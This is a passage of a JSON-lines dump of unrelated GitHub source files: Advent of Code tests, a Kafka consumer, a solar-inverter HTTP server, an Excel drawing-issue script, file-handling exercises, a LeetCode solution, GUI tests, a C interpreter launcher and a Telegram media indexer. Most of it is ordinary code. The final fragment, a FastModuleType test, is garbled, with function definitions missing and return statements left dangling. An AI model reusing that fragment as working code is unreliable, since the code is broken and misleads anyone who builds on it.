[[\"2\",\"3\",\"4\",\"5\",\"6\"], [\"4\",\"5\",\"6\",\"7\",\"8\"]])\n])\ndef test_parse_creates_correct_structure(assignmentPair, expected):\n cc = CampCleanup()\n assert cc.parse(assignmentPair) == expected\n\ndef test_findFullyOverlappedAssignments_finds_correct_overlaps():\n assignments = [\n \"2-4,6-8\",\n \"2-3,4-5\",\n \"5-7,7-9\",\n \"2-8,3-7\",\n \"6-6,4-6\",\n \"2-6,4-8\"\n ]\n\n cc = CampCleanup()\n cc.load(assignments)\n\n overlaps = cc.findFullyOverlappedAssignments()\n assert overlaps == [[[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], [\"3\",\"4\",\"5\",\"6\",\"7\"]], [[\"6\"], [\"4\",\"5\",\"6\"]]]\n assert len(overlaps) == 2\n\ndef test_findFullyOverlappedAssignments_finds_correct_overlaps_using_provided_input_file():\n f = open(\"input.txt\", \"r\")\n assignments = f.readlines()\n f.close()\n\n cc = CampCleanup()\n cc.load(assignments)\n assert len(cc.findFullyOverlappedAssignments()) == 526\n\ndef test_findAnyOverlappedAssignments_finds_correct_overlaps():\n assignments = [\n \"2-4,6-8\",\n \"2-3,4-5\",\n \"5-7,7-9\",\n \"2-8,3-7\",\n \"6-6,4-6\",\n \"2-6,4-8\"\n ]\n\n cc = CampCleanup()\n cc.load(assignments)\n\n overlaps = cc.findAnyOverlappedAssignments()\n assert overlaps == [\n [[\"5\",\"6\",\"7\"], [\"7\",\"8\",\"9\"]],\n [[\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\"], [\"3\",\"4\",\"5\",\"6\",\"7\"]],\n [[\"6\"], [\"4\",\"5\",\"6\"]],\n [[\"2\",\"3\",\"4\",\"5\",\"6\"], [\"4\",\"5\",\"6\",\"7\",\"8\"]]\n ]\n assert len(overlaps) == 4\n\ndef test_findAnyOverlappedAssignments_finds_correct_overlaps_using_provided_input_file():\n f = open(\"input.txt\", \"r\")\n assignments = f.readlines()\n f.close()\n\n cc = CampCleanup()\n cc.load(assignments)\n assert len(cc.findAnyOverlappedAssignments()) == 
886","repo_name":"mightymuke/advent-of-code-2022","sub_path":"Day 4 - Camp Cleanup/test_campcleanup.py","file_name":"test_campcleanup.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73674741494","text":"from kafka import KafkaConsumer\nimport argparse\nimport struct\nimport requests\nimport os\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--host')\n parser.add_argument('--topic')\n parser.add_argument(\"--security-protocol\")\n parser.add_argument(\"--schema-registry\")\n return parser.parse_args()\n\nargs = get_args()\nprint(\"args:\", args)\n\n# To consume latest messages and auto-commit offsets\nconsumer = KafkaConsumer(\n args.topic,\n security_protocol=args.security_protocol,\n group_id='group-id-1',\n auto_offset_reset=\"earliest\",\n bootstrap_servers=args.host.split(\",\")\n)\n\nprint(\"configured\")\nfor message in consumer:\n\n try: \n magic, schema_id = struct.unpack('>bI', message.value[:5])\n print(magic, schema_id)\n schema_url = f\"{args.schema_registry}/subjects/{args.topic}-value/versions/{schema_id}\"\n print(f\"try recover schema by {schema_url}\")\n schema = requests.get(schema_url, headers={'Content-Type': 'application/json'})\n print(schema.json())\n # f\"http://localhost:8081/schemas/ids/1\"\n # f\"http://localhost:8081/subjects/{args.topic}-value/versions/1\"\n\n except Exception as e:\n print(e)\n \n print(\"topic=%s partition=%d offset=%d key=%s value=%s\" % (message.topic, message.partition, message.offset, message.key, message.value))\n\n\nos.exit()","repo_name":"luizamboni/kafka-study","sub_path":"apps/examples/basic/basic-consumer.py","file_name":"basic-consumer.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"42313608932","text":"import os, sys, getpass, socket, platform\nfrom shutil import copyfile\n\n# ************* Base Manager *************\nclass baseManager():\n def __init__(self):\n self.host = self.getHostname()\n self.user = self.getUser()\n self.sysInfo = self.getSysInfo() \n self.root = self.getRoot()\n self.avatarSrc = self.avatarSrc()\n\n\n def getUser(self):\n username = getpass.getuser()\n return username\n\n def getHostname(self):\n hostname = socket.gethostname()\n return hostname\n\n def getSysInfo(self):\n sysInfo = {}\n details = platform.uname()\n\n if sys.platform == 'linux' or sys.platform == 'linux2':\n sysInfo = dict(base=details.system, os=platform.dist()[0].capitalize(), kernel=details.release,\n architecture=details.machine, processor=details.processor)\n elif sys.platform == 'darwin':\n # Find a Darwin system to perform unit-testing\n # macInfo = platform.mac_ver(release='', versioninfo=('', '', ''), machine='')\n sysInfo = dict(base=details.system, os=platform.mac_ver()[0].capitalize(), kernel=platform.release(),\n architecture=details.machine, processor=details.processor)\n elif sys.platform == 'win32':\n sysInfo = dict(base=details.system, os=platform.win32_ver()[0].capitalize(), kernel='Windows NT',\n architecture=details.machine, processor=details.processor)\n\n return sysInfo\n\n #def getArchitecture(self):\n\n\n def avatarSrc(self):\n path = \"\"\n if self.sysInfo['base'] == 'Linux' or self.sysInfo['base'] == 'Linux2':\n gnome2Base = os.path.join('/home', self.user, '.face')\n gnome3Base = open(os.path.join('/var', 'lib', 'AccountsService', 'users', self.user), 'r')\n\n # Gnome 
2 check\n if os.path.exists(gnome2Base):\n path = gnome2Base\n else:\n #Gnome 3 check\n for line in gnome3Base:\n if line.startswith('Icon='):\n path = str(line[5:])\n path = path.strip('\\n')\n gnome3Base.close()\n\n return path\n\n def getRoot(self):\n path = ''\n if self.sysInfo['base'] == 'Linux' or self.sysInfo['base'] == 'Linux2':\n path = os.path.join('/home', self.user, '.RootNET')\n\n if not os.path.exists(path):\n os.mkdir(path)\n os.chmod(path, 0o700)\n\n return path\n\n\nif __name__ == \"__main__\":\n xd = baseManager()\n print(xd.getSysInfo())\n\n\n","repo_name":"CodeRoot-Systems/RootNET","sub_path":"lib/libbase.py","file_name":"libbase.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12901799825","text":"import os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('copy.txt')#打开文件copy.txt\nn=open('new.txt','w')#创建文件new.txt\ns=f.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f.readline()\nf.close()\nn.close()\n#思路:手动读取第一行文字,然后用while循环控制复制结束\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('cat1.txt','a')#打开文件copy.txt\nn=open('cat2.txt')#创建文件new.txt\ns=n.readline()\nwhile s!='':#直到文章的末尾\n f.writelines(s)\n s=n.readline()\nf.close()\nn.close()\n#思路:只需要在第一题的基础上将操作模式等修改即可\n\n#判断是否是符合条件的整数\ndef func(n):\n s=str(abs(n))\n if len(s)<2:\n return False\n for i in range(len(s)):\n if (i%2==0) and ((ord(s[i])-48)%2==0):\n return False\n return True\n#主程序\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('StrInts.txt','rb+')#打开文件\nr=open('ResultInts.txt','w+')#创建文件\ns=f.readlines()\nj,l,n,ss=0,[],-1,' '\nfor i in range(len(s)):\n ss=bytes.decode(s[i])\n for i in range(len(ss)):\n o=ord(ss[i])\n if o in range(48,58):\n if j<0:\n j=j*10+48-o\n if j>0:\n j=j*10+o-48\n if not(ord(ss[i-1])in range(48,58)):\n j=o-48\n if ss[i-1]=='-':\n j=0-j\n\n elif j!=0:\n l.append(j)\n j=0\nprint(l)\nll=[]\nfor i in l:\n if func(i):\n ll.append(i)\nfor i in range(((len(ll)-1)//3)+1):#枚举每行\n s=''\n for j in range(3*i,min(len(ll),3*i+3)):\n # 用min来防止最后的一两个越界\n s=s+'%8d'%ll[j]\n #s=str.encode(s)\n r.writelines(s)\n\nf.close()\nr.close()\n\n#思路:(1)读入每行\n# (2)寻找数字\n# (3)判断数字\n# (4)输出\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('students_data.txt','rb+')#打开文件\ns=f.readlines()\nl=[[None for _ in range(3)]for _ in range(len(s))]\nfor i in range(len(s)):\n ss=bytes.decode(s[i])\n l[i]=list(ss.split())\n l[i][0]=int(l[i][0])\n l[i][2] = int(l[i][2])\n print('%-10d%-15s%5d'%tuple(l[i]))\n#排序\nl.sort(key=lambda x:x[0])\n#清空txt\nf.seek(0)\nf.truncate()\n#重新输入\ns=int(input('please input the s:'))\nfor i in range(len(l)):\n if l[i][0]>=s:\n ss=' '.join((str(l[i][0]),l[i][1],str(l[i][2]),'\\n')).encode()\n print(ss)\n f.write(ss)\n\n\nimport os\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\nf=open('numbers.txt','rb+')#打开文件\nr=open('sort.txt','w+')#创建文件\ns=f.readlines()\nl=[]\nfor i in range(len(s)):\n l.append(float(s[i].decode()))\n#排序\nl.sort()\ntot=sum(l)\n#平均值\np=tot/len(l)\ntot=0\nfor i in l:\n ss=str(i)+'\\n'\n r.write(ss)\n tot+=(i-p)**2\nss=str(p)+'\\n'\nr.write(ss)\n#方差\nfang=tot/len(l)\nss=str(fang)+'\\n'\nr.write(ss)\n#思路:整体读入一行行处理,排序,计算平均值和方差,写入文件\n\n\nimport os\nos.chdir(r'd:/python-ch10/folder/')#改变当前工作目录\nf1=open('file1.txt')#打开文件1\nf2=open('file2.txt')#打开文件2\nf3=open('file3.txt')#打开文件3\nf4=open('file4.txt')#打开文件4\nn=open('merge.txt','w+')#创建文件\ns=f1.readline()\nwhile s!='':#直到文章的末尾\n n.writelines(s)\n s=f1.readline()\nn.writelines('\\n')\ns=f2.readline()\nwhile 
s!='':#直到文章的末尾\r\n n.writelines(s)\r\n s=f2.readline()\r\nn.writelines('\\n')\r\ns=f3.readline()\r\nwhile s!='':#直到文章的末尾\r\n n.writelines(s)\r\n s=f3.readline()\r\nn.writelines('\\n')\r\ns=f4.readline()\r\nwhile s!='':#直到文章的末尾\r\n n.writelines(s)\r\n s=f4.readline()\r\n#思路:文件一个一个读入,按照第一题的方式进行写入,切换文件中途换行\r\n\r\n\r\n\r\nimport os\r\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\r\nf=open('word.txt')#打开文件\r\nr=open('new_word.txt','w+')#创建文件\r\ns=f.readlines()#储存单词\r\nfor i in s:\r\n if i[0].upper() in ('A','E','I','O','U'):\r\n r.write(i)#写入\r\n#思路:打开文件,判断是否符合,将符合的写入新文件\r\n\r\n\r\nimport os\r\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\r\nf=open('names.txt','r+')#打开文件\r\ns=f.readlines()#储存单词\r\nss=input('please input a name:')\r\ns=set(s)\r\ns.add(ss+'\\n')\r\ns=list(s)\r\ns.sort()\r\n#清空txt\r\nf.seek(0)\r\nf.truncate()\r\nfor i in s:\r\n f.write(i)\r\n#思路:打开文件,读入新名字,用集合去重,转化成列表排序,写入\r\n\r\nimport os\r\nos.chdir(r'd:/python-ch10/')#改变当前工作目录\r\nf=open('bigfile.txt','rb+')#打开文件\r\nl=[]\r\nl.append(0)\r\ns=f.readline()\r\nl.append(f.tell())\r\nwhile s!=''.encode():#直到文章的末尾\r\n s=f.readline()\r\n l.append(f.tell())\r\nprint(len(l)-2)#输出行数(第0个和最后一次循环分别多读了一个)\r\nwhile 1:\r\n n=int(input('please input the number of the line:'))\r\n f.seek(l[n-1])\r\n print(f.readline().decode())\r\n#思路:用tell先扫描一遍文件,记录每行开头的位置所在,并记录至一个列表\r\n# 这样在输入之后就可以直接输出\r\n","repo_name":"CColike/Soochow-University-CS","sub_path":"python/2027405033-exp-9.py","file_name":"2027405033-exp-9.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}{"seq_id":"18215182062","text":"class Solution:\n def maximumInvitations(self, grid: List[List[int]]) -> int:\n m = len(grid)\n n = len(grid[0])\n ans = 0\n mate = [-1] * n # girl's mate\n\n # Returns true if boy i can make an invitation.\n def canInvite(i, seen):\n for j in range(n):\n if not grid[i][j] or seen[j]:\n continue\n seen[j] = True\n if mate[j] == -1 or canInvite(mate[j], seen):\n mate[j] = i # Match girl j with boy i\n return True\n return False\n\n for i in range(m):\n seen = [False] * n\n if canInvite(i, seen):\n ans += 1\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/1820. 
Maximum Number of Accepted Invitations/1820.py","file_name":"1820.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"74991444851","text":"# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\nfrom tests import TestCase, skipIf\n\nfrom quodlibet.util.tags import USER_TAGS\nfrom quodlibet.qltk import is_wayland\n\n\nclass TagsCombo(TestCase):\n def setUp(self):\n self.all = self.Kind()\n self.some = self.Kind([\"artist\", \"album\", \"~people\", \"foobar\"])\n\n def tearDown(self):\n self.all.destroy()\n self.some.destroy()\n\n\nclass TagsComboMixin:\n\n def test_none(self):\n self.failUnlessRaises(ValueError, self.Kind, [])\n\n def test_some(self):\n self.some.set_active(2)\n self.failUnlessEqual(self.some.tag, \"foobar\")\n\n def test_all(self):\n tags = list(USER_TAGS)\n tags.sort()\n for i, value in enumerate(tags):\n self.all.set_active(i)\n self.failUnlessEqual(self.all.tag, value)\n\n\n@skipIf(is_wayland(), \"crashes..\")\nclass TTagsComboBox(TagsCombo, TagsComboMixin):\n from quodlibet.qltk.tagscombobox import TagsComboBox as Kind\n Kind # noqa\n\n\n@skipIf(is_wayland(), \"crashes..\")\nclass TTagsComboBoxEntry(TagsCombo, TagsComboMixin):\n from quodlibet.qltk.tagscombobox import TagsComboBoxEntry as Kind\n Kind # noqa\n\n def test_custom(self):\n self.all.get_child().set_text(\"a new tag\")\n self.failUnlessEqual(self.all.tag, \"a new tag\")\n","repo_name":"quodlibet/quodlibet","sub_path":"tests/test_qltk_tagscombobox.py","file_name":"test_qltk_tagscombobox.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":1306,"dataset":"github-code","pt":"21"} +{"seq_id":"29643943056","text":"import sys\nimport datetime\nimport json\nimport threading\n# from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport requests\nfrom HoymilesPrint import get_plant_data, append_to_file, get_power, print_status, glo_inverters, glo_panels\nfrom HoymilesToJson import get_panels_json, get_panels_png\nfrom hoymiles_modbus2.datatypes import PlantData\nfrom typing import Union\nfrom io import BytesIO\n\nserver_port = 8001\nkwhmeter_url = \"http://192.168.59.68:2222/REF\"\n\n\ndef get_next_update_time():\n # Lasketaan seuraava tasaminuutti\n now = datetime.datetime.now()\n next_minute = (now.replace(second=0, microsecond=0) + datetime.timedelta(minutes=1))\n # minutes = next_minute.minute\n # if minutes in [0, 15, 30, 45]: # jätetään väliin vartit\n # next_minute = next_minute + datetime.timedelta(minutes=1)\n\n # Asetetaan ajastin seuraavalle tasaminuutille\n delay = (next_minute - now).total_seconds()\n print(datetime.datetime.now().time(), \"next: \", delay)\n return delay, next_minute\n\n\nlast_plant_data: Union[PlantData, None] = None\nlast_update_time: datetime = datetime.datetime.now()\n\n\ndef get_hoymiles_data():\n global last_plant_data\n global last_update_time\n\n delay, update_time = get_next_update_time()\n threading.Timer(delay, get_hoymiles_data).start()\n\n try:\n print(datetime.datetime.now().time(), \"start\")\n new_plant_data = get_plant_data()\n print(datetime.datetime.now().time(), \"end\")\n if not new_plant_data:\n print(\"no new plant data\")\n return\n # 
print(datetime.datetime.now().time(), \"haku\")\n print_status(new_plant_data, glo_inverters, glo_panels, sys.stdout, True)\n # append_to_file(new_plant_data)\n except Exception as err:\n print(\"Exception: \", datetime.datetime.now().time(), err)\n return\n\n summa_w = 0\n if new_plant_data.pv_power == 0:\n summa_w = get_power(new_plant_data)\n new_plant_data.pv_power = summa_w\n print(last_update_time, \"->\", datetime.datetime.now().time(), \":\", new_plant_data.pv_power, \"W\", summa_w, \"W\")\n\n if last_update_time and (last_update_time.minute-1) % 5 == 0:\n append_to_file(new_plant_data)\n\n last_plant_data = new_plant_data\n last_update_time = update_time\n\n\ndef handle_hoymiles():\n if not last_plant_data:\n return {'pvPower': 0,\n 'last_plant_data': None,\n 'pvEnergyTotal': None,\n 'pvEnergyToday': None\n }\n total = float(last_plant_data.total_production)\n today = float(last_plant_data.today_production)\n if total == 0:\n total = None\n if today == 0:\n today = None\n return {'pvPower': float(last_plant_data.pv_power),\n 'pvEnergyTotal': total,\n 'pvEnergyToday': today\n }\n\n\ndef handle_kwh_meter():\n response = requests.get(kwhmeter_url)\n if response.status_code != 200:\n print(\"kwhmeter code: \", response.status_code)\n return {'message': 'error'}\n text = response.text\n sts = text.split(\";\")\n return {\n 'mainkW': float(sts[0]),\n 'mainkWh': float(sts[2]),\n 'geokW': float(sts[3]),\n 'geokWh': float(sts[5])\n }\n\n\n\nclass MyHandler(BaseHTTPRequestHandler):\n def get_png(self, t):\n self.send_response(200)\n self.send_header(\"Content-type\", \"image/png\")\n self.end_headers()\n image = get_panels_png(last_plant_data, t)\n output = BytesIO()\n image.save(output, format=\"PNG\")\n self.wfile.write(output.getvalue())\n return t\n\n def do_GET(self):\n if self.path == \"/GetPanelPng\":\n return self.get_png(1);\n if self.path == \"/GetPanelPng2\":\n return self.get_png(2);\n if self.path == \"/GetPanelPng3\":\n return self.get_png(3);\n if self.path == \"/favicon.ico\":\n self.send_response(404)\n self.end_headers()\n return\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.end_headers()\n if self.path == \"/pannari\":\n data = handle_kwh_meter()\n elif self.path == \"/hoymiles\":\n data = handle_hoymiles()\n elif self.path == \"/all\":\n data1 = handle_hoymiles()\n data2 = handle_kwh_meter()\n data = {**data1, **data2}\n elif self.path == \"/GetPanelData\":\n data = get_panels_json(last_plant_data)\n else:\n data = {\n 'message': 'Tuntematon kutsu?'\n }\n json_data = json.dumps(data)\n self.wfile.write(json_data.encode('utf-8'))\n print(data)\n\n\n# def run(server_class=ThreadingHTTPServer, handler_class=MyHandler, port=server_port):\ndef run(server_class=HTTPServer, handler_class=MyHandler, port=server_port):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Serving at port', port)\n get_hoymiles_data()\n # threading.Timer(get_next_update_time()[0], get_hoymiles_data).start()\n httpd.serve_forever()\n\n\nrun()\n","repo_name":"vesal/hoymiles","sub_path":"hoyserver2.py","file_name":"hoyserver2.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22676789255","text":"from datetime import datetime\nstart = datetime.now()\nend = datetime.now()\n# First function (Note the use of xrange since this is in Python 2)\ndef sum1(n):\n '''\n 
Take an input of n and return the sum of the numbers from 0 to n\n '''\n final_sum = 0\n for x in range(n + 1):\n final_sum += x\n\n return final_sum\n\ndef sum2(n):\n \"\"\"\n Take an input of n and return the sum of the numbers from 0 to n\n \"\"\"\n return (n*(n+1))/2\n\nif __name__ == '__main__':\n print(sum1(10))\n print(sum2(100))\n print(start - end, sum1(100))","repo_name":"Mohammedibrahim2703/py_basics_ds","sub_path":"com/phase1/pythonDS/bigO_DS.py","file_name":"bigO_DS.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24094717670","text":"# Write a word_histogram function that takes a paragraph of text as its input, and returns a dictionary containing the tally of how many times each word in the alphabet was used in the text. For example:\n#\n# >>> word_histogram('To be or not to be')\n# {'to': 2, 'be': 2, 'or': 1, 'not': 1}\n\n#Dict. comprehension\n# def hist(string):\n# tally = {\"key\" : \"value\"}\n# par = string.lower()\n# keyList = par.split()\n# tally = {key: keyList.count(key) for key in keyList}\n# print(tally)\n#\n# hist(\"To be or not to be\")\n\n#Alt method\ndef hist2(string):\n tally = {}\n par = string.lower()\n keyList = par.split()\n for word in keyList:\n if word in tally:\n tally[word] += 1\n else:\n tally[word] = 1\n print(tally)\n\nhist2(\"To be or not to be\")\n# def letter_hist3(word):\n# tally = {}\n# for character in word:\n# if character in tally:\n# tally[character] += 1\n# else:\n# tally[character] = 1\n#\n# print(tally)\n#\n#\n","repo_name":"joshwestbury/Digital_Crafts","sub_path":"python_exercises/py_part4_ex/dict/4_word_summary.py","file_name":"4_word_summary.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10442505164","text":"#libraries\r\nimport sys\r\nimport clr\r\nimport csv\r\nclr.AddReference('ProtoGeometry')\r\nfrom Autodesk.DesignScript.Geometry import *\r\nclr.AddReferenceByName('Microsoft.Office.Interop.Excel, Version=11.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c')\r\nfrom Microsoft.Office.Interop import Excel\r\nfrom System import Array\r\n\r\n#declare inputs\r\ndict = IN[0]\r\ndate = IN[1]\r\ndir = IN[2]\r\nrev = IN[3]\r\nstakeholders = IN[4]\r\npaststatus = IN[5]\r\nupdatedemail = IN[6]\r\nemail = IN[7]\r\ndatesplit = []\r\nissuecount = []\r\nstartrow = 27\r\nstartcol = 6\r\n\r\n#file path\r\nfp_xls = dir + \"\\\\\" + \"Master Drawing Issue Sheet.xls\"\r\nfp_csv = dir + \"\\\\\" + \"data.csv\" \r\n\r\n#open Excel doc\r\nexcel = Excel.ApplicationClass()\r\nexcel.Visible = True\r\nexcel.DisplayAlerts = False\r\n\r\nworkbook = excel.Workbooks.Open(fp_xls)\r\nws = workbook.Worksheets[1]\r\n\r\n#combine email from csv and updated email from user input\r\nemail_bool = [x in email for x in updatedemail]\r\n\r\nif any(email_bool):\r\n\tcombinedemail = updatedemail\r\nelif not any(email_bool):\r\n\tcombinedemail = email + [updatedemail]\r\n\r\n#transpose back revision list\r\nrev_transpose = map(list,zip(*rev))\r\n\r\n#transpose back status list\r\nstatus_transpose = map(list,zip(*paststatus))\r\n\r\n#split date into DD/MM/YY format\r\nfor i in date:\r\n\tdatesplit.append(i.split('/'))\r\n\r\n#count number of sheets issued\r\ncount = 0\r\nfor i in rev[-1]:\r\n\tif i != '':\r\n\t\tcount +=1\r\n\t\tissuecount.append(count)\r\n\t\t\r\n#create dates arrays\r\nfor i in range(len(datesplit)):\r\n\tdatesarr = 
Array.CreateInstance(object,3, len(date))\r\n\r\n#assign values to dates arrays\r\nfor i in range(len(datesplit)):\r\n\tfor j in range(len(datesplit[i])):\r\n\t\tdatesarr[j,i] = datesplit[i][j]\r\n\r\n#get project code\r\nsplitsheetnum = dict[1][0].split('/')\r\n\r\n#create stakeholders arrays\r\nfor i in range(len(stakeholders)):\r\n\tstakeholdersarr = Array.CreateInstance(object, len(stakeholders), 1)\r\n\r\n#define range of cells\r\n#fixed columns\r\nxlrangesheetnames = ws.Range[ws.Cells(startrow,1), ws.Cells(len(issuecount)+startrow-1,1)]\r\nxlrangesheetnumbers = ws.Range[ws.Cells(startrow,4), ws.Cells(len(issuecount)+startrow-1,4)]\r\nxlrangestakeholders = ws.Range[ws.Cells(startrow-16,startcol-4), ws.Cells(len(stakeholders)+startrow-17,startcol-4)]\r\nxlrangeemail = ws.Range[ws.Cells(startrow-16,startcol), ws.Cells(len(updatedemail)+startrow-17,startcol+ len(date)-1)]\r\n\r\n#fixed rows\r\nxlrangesheetstatus = ws.Range[ws.Cells(startrow-2,startcol), ws.Cells(startrow-2,len(date)+startcol-1)]\r\nxlrangerecord = ws.Range[ws.Cells(startrow-4,startcol),ws.Cells(startrow-4,len(date)+startcol-1)]\r\n\r\n#range of rows and columns\r\nxlrangedate = ws.Range[ws.Cells(startrow-21,startcol), ws.Cells(startrow-19,len(date)+startcol-1)]\r\nxlrangerevision = ws.Range[ws.Cells(startrow,startcol), ws.Cells(len(rev[0])+startrow-1, len(date)+startcol-1)]\r\n\r\n#create arrays\r\nsheetnamearr = Array.CreateInstance(object,len(dict[0]) , 1)\r\nsheetnumberarr = Array.CreateInstance(object,len(dict[1]), len(date))\r\nrevisionarr = Array.CreateInstance(object,len(rev[0]), len(date))\r\nrecordarr = Array.CreateInstance(object,1, len(date))\r\nemailarr = Array.CreateInstance(object,len(updatedemail),len(date))\r\n\r\n\r\n#assign values to record array\r\nfor i in range(len(date)):\r\n\trecordarr[0,i] = 1\r\n\r\n#create status array\r\nstatusarr = Array.CreateInstance(object,1, len(paststatus))\r\n\r\n#assign values to status array\r\nfor i in range(len(paststatus)):\r\n\tstatusarr[0,i] = paststatus[i][0]\r\n\r\n#assign values to arrays\r\nfor i in range(len(dict)):\r\n\tfor j in range(len(dict[i])):\r\n\t\tsheetnamearr[j,0] = dict[0][j]\r\n\t\tsheetnumberarr[j,0] = dict[1][j]\r\n\r\nfor i in range(len(date)):\r\n\tfor j in range(len(rev[i])):\t\r\n\t\trevisionarr[j,i] = rev[i][j]\r\n\r\nfor i in range(len(stakeholders)):\r\n\tstakeholdersarr[i,0] = stakeholders[i]\r\n\r\n#assign values to email array\r\nif any(email_bool):\r\n\tfor i in range(len(combinedemail)):\r\n\t\temailarr[i,0] = combinedemail[i]\r\nelif not any(email_bool):\r\n\tfor i in range(len(combinedemail)):\r\n\t\tfor j in range(len(combinedemail[i])):\r\n\t\t\temailarr[j,i] = combinedemail[i][j]\r\n\r\n\r\n#transpose email arr\r\nif any(email_bool):\r\n\temail_transpose = combinedemail\r\nelif not any(email_bool):\r\n\temail_transpose = map(list,zip(*combinedemail))\r\n\r\n#transpose date split\r\ndate_transpose = map(list,zip(*datesplit))\r\n\r\n#write to csv\r\nwith open(fp_csv, 'wb') as csvfile:\r\n\tcsvwriter = csv.writer(csvfile)\r\n\tcsvwriter.writerows(date_transpose)\r\n\tcsvwriter.writerows(email_transpose)\r\n\tcsvwriter.writerows(status_transpose)\r\n\tcsvwriter.writerows(rev_transpose)\r\n\r\n#write arrays to excel\t\t\r\nxlrangerevision.Value2 = revisionarr\r\nxlrangesheetnames.Value2 = sheetnamearr\r\nxlrangesheetnumbers.Value2 = sheetnumberarr \r\nxlrangesheetstatus.Value2 = statusarr\r\nxlrangerecord.Value2 = recordarr \r\nxlrangedate.Value2 = datesarr\r\nxlrangestakeholders.Value2 = stakeholdersarr\r\nxlrangeemail.Value2 = 
emailarr\r\n\r\nOUT = 'Success!'","repo_name":"nicholaseaw/AutoTransmittal","sub_path":"writetoExcel.py","file_name":"writetoExcel.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23706249389","text":"from utils import save_file\nfrom info import SESSION, API_ID, API_HASH, BOT_TOKEN, CHANNELS, USERBOT_STRING_SESSION, USER_SESSION, id_pattern\nfrom pyrogram import Client\nimport asyncio\nimport logging\nimport logging.config\n\n# Get logging configurations\nlogging.config.fileConfig('logging.conf')\nlogging.getLogger().setLevel(logging.ERROR)\n\nlogger = logging.getLogger(__name__)\nlock = asyncio.Lock()\n\nasync def main():\n \"\"\"Save old files in database with the help of user bot\"\"\"\n user_bot = Client(USERBOT_STRING_SESSION, API_ID, API_HASH) # Create user bot, b'cause get_chat_history is not available in bot\n bot = Client(SESSION, API_ID, API_HASH, bot_token=BOT_TOKEN)\n\n await user_bot.start()\n await bot.start()\n\n try:\n print('Started')\n for channel in CHANNELS:\n print(f'Checking {channel}') \n async for user_message in user_bot.get_chat_history(channel):\n print(f'Checking {user_message.id}')\n message = await user_bot.get_messages(channel, user_message.id, replies=0)\n for file_type in (\"document\", \"video\", \"audio\"):\n media = getattr(message, file_type, None)\n if media is not None:\n break\n else:\n continue\n \n media.file_type = file_type\n media.caption = message.caption\n await save_file(media)\n print(f'Saved {media.file_name}')\n finally:\n await user_bot.stop()\n await bot.stop()\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","repo_name":"thesuhu/media-finder-bot","sub_path":"run_once.py","file_name":"run_once.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30823083034","text":"from interpreter.interpreter.interpreter import Interpreter\nimport argparse\n\n\nparser = argparse.ArgumentParser(description='Execute .c file')\nparser.add_argument('-f', '--file', help='File with C code')\nparser.add_argument('-c', '--code', help='Code of C code')\n\nargs = parser.parse_args()\nif not args.file and not args.code:\n argparse.ArgumentParser().error('You must choose one argument [-f or -c]')\n\nelif args.file and args.code:\n argparse.ArgumentParser().error('You can choose only one argument [-f or -c]')\n\ncode = ''\nif args.file:\n with open(args.file, 'r') as file:\n code = file.read()\nelse:\n code = args.code\nInterpreter.run(code)\n","repo_name":"SKantar/CInterpreter","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"21"} +{"seq_id":"15938995441","text":"\nfrom tensorflow.python.platform import test\nfrom tensorflow.python.util import fast_module_type\nFastModuleType = fast_module_type.get_fast_module_type_class()\nclass ChildFastModule(FastModuleType):\n return 2\n raise AttributeError(\"Pass to getattr\")\n return 3\nclass FastModuleTypeTest(test.TestCase):\n def testBaseGetattribute(self):\n module = ChildFastModule(\"test\")\n module.foo = 1\n self.assertEqual(1, module.foo)\n def testGetattributeCallback(self):\n module = ChildFastModule(\"test\")\n FastModuleType.set_getattribute_callback(module,\n 